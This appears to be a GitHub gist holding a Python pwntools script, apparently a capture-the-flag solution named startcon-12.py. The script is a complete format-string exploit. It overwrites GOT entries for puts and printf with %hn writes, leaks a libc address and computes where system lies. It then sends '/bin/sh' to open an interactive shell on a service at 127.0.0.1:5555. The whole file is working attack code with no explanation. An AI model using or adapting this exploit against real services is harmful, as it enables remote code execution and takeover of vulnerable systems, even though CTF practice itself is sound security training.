/startcon-12.py
Created Nov 29, 2016
| #!/usr/bin/python | |
| import pwn | |
| import sys | |
| def constructPayload(instr): | |
| cPlLen = len(instr) | |
| cPlTotal = instr + "+" * (99 - cPlLen) | |
| return cPlTotal | |
| def confirmHex(in_int): | |
| print "confirm string ok: %" + str(in_int) + "x" | |
| return raw_input(" > ").rstrip() | |
| STAGE1_OVWR = constructPayload("B\x1a\xA0\x04\x08\x18\xA0\x04\x08%2042x]%5$hn%20002x%12041x%6$hn") | |
| STAGE2_LEAK = constructPayload("[LEAQ][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][LEAQ]") | |
| if len(sys.argv) == 1: | |
| print " [!] deploying format string against remote target" | |
| p = pwn.remote("127.0.0.1",5555) | |
| print " [!] sending stage1 puts overwrite" | |
| p.sendline(STAGE1_OVWR) | |
| print " [!] sending stage2 address leak" | |
| p.sendline(STAGE2_LEAK) | |
| p.recvuntil("[LEAQ]") | |
| data = p.recvuntil("[LEAQ]") | |
| print " [+] " + data | |
| offset = int(data[11:19],16) | |
| system_addr = offset - 1626192 | |
| print " [!] leaked 0x%08x, i think system is at 0x%08x" % (offset, system_addr) | |
| system_addr_hiword = (system_addr & 0x00FF0000) / 0xFFFF | |
| system_addr_loword = (system_addr & 0xFFFF) | |
| STAGE3_OVWR = constructPayload("B\x0E\xA0\x04\x08\x0C\xA0\x04\x08" + confirmHex(system_addr_hiword - 9) + "%5$hhn" + confirmHex(system_addr_loword - system_addr_hiword - 9) + "%6$hn") | |
| print " [!] sending stage3 printf overwrite... waiting" | |
| p.sendline(STAGE3_OVWR) | |
| p.recvuntil("format string>") | |
| print " [!] okay, sending /bin/sh for printf/system..." | |
| p.sendline("/bin/sh;//") | |
| p.interactive() | |
| p.close() | |
| elif sys.argv[1] == "-p": | |
| print STAGE1_OVWR | |
| print STAGE2_LEAK |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment